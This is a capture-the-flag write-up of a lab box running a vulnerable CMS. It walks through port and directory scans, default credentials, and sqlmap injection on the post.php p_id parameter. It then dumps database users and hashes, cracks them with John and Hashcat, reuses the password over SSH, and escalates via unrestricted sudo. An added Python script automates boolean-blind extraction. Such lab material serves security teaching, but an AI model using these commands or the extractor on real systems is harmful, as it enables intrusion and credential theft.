ParrotCTF: Aero Space Writeup

May 3, 2023

6 min read

Creator: parrotassasin15

Difficulty: Medium

Category: SQL Injection

Link: parrot-ctfs.com/hacking/labs/1

Host: 10.14.0.71

Objectives:

  • Obtain user & root flags

  • Complete all questions

Description:

Can you find the vulnerabilities in this CMS? If so, be sure to report them to their GitHub.

Set up

Before engaging anything, download your free VPN pack from the VPN tab.

After downloading your VPN pack, start the VPN with openvpn (not open), pointing it at the .ovpn file:

sudo openvpn path/to/pack.ovpn

Most of the time the pack will be in your Downloads folder, so the command looks like this:

sudo openvpn ~/Downloads/name.ovpn

Keep that terminal open; the tunnel goes down when openvpn exits. After that, ping the host to confirm it is reachable through the tunnel.

Enumeration

Let's dive in with a quick nmap scan. Since the machine category and description tell us we are dealing with a CMS that is vulnerable to SQL injection, the scan should show us which port the CMS is running on and what other ports are open.

nmap 10.14.0.71
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 15:24 
Nmap scan report for aero (10.14.0.71)
Host is up (0.23s latency).
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

Without wasting any time, we need the version of the CMS running on port 80 and its GitHub repository.

We can browse to port 80 in Firefox or your favorite browser and see whether a CMS version or GitHub link is mentioned anywhere.

Common places to look: the page footer, comments in the page source, and the response headers. The Wappalyzer extension can also identify the technology stack.

After trying all of the above I didn't get the version, but I got the developer's name from the default page footer, so a simple Google search of that name leads us to the repo.

With the repo in hand we can get the version and maybe other juicy stuff. Checking the latest commits shows that the latest version is v0.0.1. There is another, easier way of getting the version that I can't remember exactly.

Now that we have the CMS version, should we fire up Nessus and Metasploit and pwn the mainframe? NO.

How can we use this version number and GitHub repo?:

  1. Search for known vulnerabilities associated with the version (which we already know is SQLi)

  2. Check if we can find default credentials in the GitHub repo

At this point, we know that Aero CMS v0.0.1 is vulnerable to SQL injection, but where does it occur? Back to the drawing board: we need to enumerate the web application to find the injectable parameter.

To achieve this we can fuzz for endpoints and paths with Gobuster, Feroxbuster, or FFUF. Let's run Feroxbuster and FFUF at the same time, because why not (Feroxbuster recurses into the directories it finds by default; the FFUF command below does not, so it only covers the top level).

Here is the syntax for both:

feroxbuster --url http://10.14.0.71/ -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x py,html,config,conf,txt,php,dev,backup,bak

ffuf -u "http://10.14.0.71/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc all -fc 404 -ic -e .bak,.db,.config,.txt,.backup,.php,.html,.htm,.tar,.zip,.js -c

This is what we will get after running either of the above commands:

──────────────────────────────────────────────────
301        9l       28w      309c http://10.14.0.71/images
200      181l      371w     6171c http://10.14.0.71/search.php
200      233l      484w        0c http://10.14.0.71/index.php
302      179l      371w     6137c http://10.14.0.71/category.php
301        9l       28w      308c http://10.14.0.71/admin
301        9l       28w      315c http://10.14.0.71/admin/images
302      293l      627w        0c http://10.14.0.71/admin/index.php
200      138l      308w     4778c http://10.14.0.71/registration.php
302      192l      464w     7470c http://10.14.0.71/admin/comments.php
302      194l      458w     7933c http://10.14.0.71/admin/users.php
301        9l       28w      311c http://10.14.0.71/includes
200        1l        0w        1c http://10.14.0.71/includes/login.php
301        9l       28w      312c http://10.14.0.71/admin/css
200       31l       88w      988c http://10.14.0.71/includes/header.php
301        9l       28w      317c http://10.14.0.71/admin/includes
302       44l       94w     1275c http://10.14.0.71/admin/includes/header.php
301        9l       28w      313c http://10.14.0.71/javascript
301        9l       28w      308c http://10.14.0.71/fonts

Sweet, looking at that output we can see an admin panel (/admin), a search page (/search.php), a registration page, and an includes directory with login.php and header.php in it.

Remember that we can get the default username and password from the GitHub repo or from the target's homepage: Username: admin, Password: password.

With those credentials we can edit posts on the blog, add users and give them permissions, but that's not our goal; we need to find where the SQLi occurs.

Okay, so this is what we have so far for the blog's paths:

/search.php
/login.php
/post.php
/admin.php
/category.php
-------snip--------

Well, this is where we channel our inner 1337_h4x0r moment.

Exploitation

We can fire up the old reliable sqlmap, or do the injection manually, on the following endpoints:

category.php?category=1
post.php?p_id=1

If you browse all the paths properly, it is a buffet of user input.

Being elite hackers, we are going to target http://10.14.0.71/post.php?p_id=1 . There are other places we could test for SQL injection, like the search bar via Burp Suite, but let's stick with /post.php?p_id=1

Let's craft the sqlmap command to trigger the vulnerability (the URL is quoted so the shell does not touch the ? and =):

sqlmap -u "http://10.14.0.71/post.php?p_id=1" --dbms mysql --level 3 --risk 3

We pass --dbms because we already know from Wappalyzer that the database is MySQL, which saves sqlmap from fingerprinting every backend. A word on --risk 3: it enables OR-based boolean payloads, which can modify data if the injectable query turns out to be an UPDATE or DELETE, so keep it for lab boxes like this one.

After running the above command we get the following output from sqlmap :

---
Parameter: p_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p_id=1 AND 5165=5165

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p_id=1 AND (SELECT 9525 FROM (SELECT(SLEEP(5)))Yhmj)
---
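To see what sqlmap's boolean-based blind finding actually means, here is the same technique done by hand. This is an added example, not code from this writeup or from the Aero CMS repository: it builds an in-memory sqlite3 database with constructed posts and users rows (a placeholder string stands in for neil's hash), a post_vulnerable() function that concatenates p_id into its query the way the finding implies post.php does (the exact PHP is assumed, not taken from the repo), a hardened post_safe() with a bound parameter, and an extractor that recovers neil's password field one character at a time by binary-searching each code point with comparison payloads. sqlite's unicode() and substr() stand in for MySQL's ASCII() and SUBSTRING(); the function names are parameters so the same logic applies to the real backend.

```python
"""Boolean-based blind SQL injection, by hand, against a simulated post.php?p_id= endpoint.

Added example, not code from the original writeup or from the Aero CMS project.
The database, rows and hash value below are constructed for the demo; sqlite3
stands in for the target's MySQL backend.
"""
import sqlite3

# Constructed sample rows standing in for aerocms.users. The "hash" strings are
# placeholders, not real bcrypt digests.
NEIL_HASH = "$2y$10$constructedSampleHashForDemo"
SAMPLE_USERS = [
    (1, "admin", "$2y$10$constructedAdminHash"),
    (2, "neil", NEIL_HASH),
]
NEIL_QUERY = "SELECT password FROM users WHERE username='neil'"


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (post_id INTEGER PRIMARY KEY, post_title TEXT)")
    con.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO posts VALUES (?, ?)", [(1, "First post"), (2, "Second post")])
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def post_vulnerable(con, p_id):
    """Mimics post.php building its query by string concatenation (assumed shape, not the real PHP)."""
    return con.execute(f"SELECT post_title FROM posts WHERE post_id = {p_id}").fetchall()


def post_safe(con, p_id):
    """Hardened version: p_id is bound as data and never parsed as SQL."""
    return con.execute("SELECT post_title FROM posts WHERE post_id = ?", (p_id,)).fetchall()


class BlindOracle:
    """Turns 'did post 1 render?' into a yes/no answer for an injected condition."""

    def __init__(self, endpoint, con):
        self.endpoint, self.con, self.calls = endpoint, con, 0

    def __call__(self, condition):
        self.calls += 1
        # p_id=1 AND (<condition>): the post row comes back only when the condition is true
        return len(self.endpoint(self.con, f"1 AND ({condition})")) > 0

    def is_injectable(self):
        # Sanity check before trusting the oracle: a tautology must behave differently from a
        # contradiction, otherwise we would "extract" garbage from a page that always (or never) renders.
        return self("1=1") and not self("1=2")


def extract_field(oracle, subquery, max_len=80, ascii_fn="unicode", substr_fn="substr"):
    """Recover the string returned by `subquery` one character at a time.

    Each character is found by binary search over its code point (7 oracle calls for 0..127)
    instead of trying every printable character. ascii_fn/substr_fn default to the sqlite
    names; against MySQL pass ascii_fn="ASCII", substr_fn="SUBSTRING".
    """
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"{ascii_fn}({substr_fn}(({subquery}),{pos},1)) > {mid}"
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string: substr() is empty, so no comparison is ever true
            break
        out += chr(lo)
    return out


def run_demo():
    """Run the extraction against both endpoints; returns {name: (value, oracle_calls) or None}."""
    con = build_db()
    results = {}
    for name, endpoint in (("vulnerable", post_vulnerable), ("safe", post_safe)):
        oracle = BlindOracle(endpoint, con)
        if not oracle.is_injectable():
            results[name] = None  # bound parameter: no oracle, nothing to extract
            continue
        results[name] = (extract_field(oracle, NEIL_QUERY), oracle.calls)
    return results


if __name__ == "__main__":
    for name, res in run_demo().items():
        print(f"{name}: {res}")
```

Against the hardened endpoint the tautology/contradiction check fails and the extractor refuses to run, which is the same check worth doing by hand before trusting any blind finding. Against the vulnerable one the whole field comes back at 7 requests per character plus one extra round to detect the end of the string, which is why sqlmap's boolean-based extraction is so much faster than the time-based SLEEP variant it also reported.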

We are golden! The p_id parameter it is. Now it's time to get the creds.

Time to dump some more info and see what we will be working with. Take this syntax and slap it right on the terminal:

sqlmap -u "http://10.14.0.71/post.php?p_id=1" --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

It is quicker to dump one thing at a time, from the database names down to the tables and columns, rather than everything in one run; either way, here are the database users:

database management system users [7]:
[*] 'debian-sys-maint'@'localhost'
[*] 'mysql.infoschema'@'localhost'
[*] 'mysql.session'@'localhost'
[*] 'mysql.sys'@'localhost'
[*] 'neil'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'localhost'

Oooow, look at that Neil guy. He looks famous; I wonder what he did back then. We won't mind getting his password hash. The database name aerocms comes from the --dbs output; the users table and its columns come from running the same command with --tables and then --columns:

sqlmap -u "http://10.14.0.71/post.php?p_id=1" -p p_id -D aerocms -T users -C user_id,username,password --dump --threads=6

From here we can crack the hash with John the Ripper or Hashcat using the rockyou.txt wordlist. Save neil's hash into neil.hash, then:

john neil.hash --wordlist=/home/xi/rockyou.txt

Then: john neil.hash --show

Or with Hashcat (mode 3200 is bcrypt, which is slow by design, so expect this to take far longer than an MD5 crack): hashcat -m 3200 neil.hash rockyou.txt

After retrieving neil's password we could log in to the blog, but first let's see whether it also works on the SSH service on port 22.

ssh neil@10.14.0.71

In our case the cracked password is reused on SSH, so we get a shell and can grab and submit user.txt:

neil@space:~$ cat user.txt
76*************************************fff
neil@space:~$

root.txt

First, run sudo -l to check what our user neil is allowed to run through sudo:

neil@space:~$ sudo -l
Matching Defaults entries for neil on space:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User neil may run the following commands on space:
    (ALL : ALL) ALL
neil@space:~$

(ALL : ALL) ALL with no NOPASSWD tag means neil can run any command as root after re-entering his own password, which we already have, so this is as easy as sudo su:

neil@space:~$ sudo su
root@space:/home/neil# cd ~
root@space:~# cat root.txt 
2024****************************5602
root@space:~#

GGs